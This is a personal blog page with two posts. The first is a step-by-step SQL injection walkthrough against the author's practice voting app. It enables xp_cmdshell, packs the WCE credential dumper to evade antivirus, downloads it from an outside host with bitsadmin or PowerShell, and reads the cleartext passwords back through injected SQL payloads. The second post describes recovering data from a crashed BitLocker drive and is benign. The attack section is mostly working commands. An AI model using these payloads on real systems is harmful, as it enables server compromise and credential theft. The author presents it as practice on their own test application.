Monday, September 2, 2013

Get credentials of system through Sql Injection

I was wondering how to get the credentials and rdp into the system through a Sql Injection. To practice the sql injection I have created a test voting application (Asp.net 4.5). It can be downloaded at: https://github.com/ka3hk/web_attacks

Here are the steps to get the credentials through sqlI:

  1. Enable xp_cmdshell 
  2. Download wce on to the machine 
  3. Get the IP address
  4. Run wce as the administrator & output to a text file
  5. Read the data from the ouput file

1. Enable xp_cmdshell

xp_cmdshell allows command execution on windows based systems. It is usually not enabled by default & it has to be enabled. It can be enabled with this command:

EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

Now we should be able to run commands through sql. The format is below:

execute xp_cmdshell 'command'

Reading the output from xp_cmdshell is slightly tricky. This can be done in three steps:
  • Create a new table (say IIP) with 1 column and insert the output of xp_cmdshell into a table
  • Read the data from the table IIP using union
  • Delete the table IIP
Here is an example on using xp_cmdshell to get the IP using ipconfig
  • create table iip(line varchar(2000));insert into iip  execute xp_cmdshell 'ipconfig'
  • union select 2,line,'a',2 from iip
  • drop table iip

2. Download wce on the machine

WCE (windows credential extractor) is an awesome tool which can be used to dump credentials in clear text. You will need to run as administrator to run this tool. Most AVs have blacklisted the tool. 
I used a packer mpress (UPX packer should work as well) to pack this executable to avoid detection. 


Check this executable for AV. 
Host this exe on an internet site or some place the sql server can reach. Use the command line below to download files or powershell can be used as well. 

bitsadmin /transfer mydownloadjob  /download /priority normal http://yoursite destination

$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile("source","dest")

3. Get the IP

Use xp_cmdshell to get the IP
execute xp_cmdshell 'ipconfig'

4. Run WCE as admin and output data to a file

Wce should be run as an admin & it was hard to read the output directly from wce through sql. So I sent the output to a file. Later read the values from the output file into a table in the database. 

WCE command
C:\temp\wce_mp.exe -w > C:\temp\output.txt

SQL command
k3';create table iip(line varchar(2000));insert into iip  execute xp_cmdshell 'C:\temp\wce_mp.exe -w > C:\temp\output.txt';--

5. Read data from the file

The data can be read using the windows command type
type file.txt

SQL Command to read output
k3';insert into iip  execute xp_cmdshell 'type C:\temp\output.txt';--

I have created a video for the exploit. 




Sunday, August 25, 2013

Recovering data from a bitlockered crashed hard disk


My hard disk of my main machine crashed on 8/9. Had most of the data on this drive. I had to now recover a bitlocker encrypted crashed 1TB hard disk.
After a LOT of experimenting and frustrated hours, I could recover most of the data back (I got all the data I cared about).

Here are the steps I took to recover the data:

  1. Remove the crashed hard disk from the machine
  2. DO not run test disk or check disk or try to unlock the drive through the UI. Any of these actions will damage the hard disk further & reduce the chances of recovering data
  3. Put the hard disk in a ziplock & stick in the freezer for a couple of hrs (sounds ridiculous but works)
  4. Get a SATA to USB cable so that you can let the hard disk breathe or you can cool it with an external fan. I bought this one, it was DOA (Dead on arrival) did not help.
  5. I got a new 3TB hard disk, had to install Intel Rapid storage technology software for windows to detect any HD > 1TB
  6. Use SystemRescue CD, a live CD linux distribution which has the awesome tool ddrescue
  7. Copy the whole hard disk image into another working hard disk (mine was a 3TB hard disk). This process takes ~6 hrs because it tries to copy the whole image. At the end of this I had a ~1TB .img file (ddrescue /corrupted drive /good drive log.txt -r 3).The no. of retries is 3.
  8. Boot back into windows & use repair-bde to recover the bitlockered data
  9. This takes a couple of hrs & creates another .img file which should have your data. J


These blogs helped me out: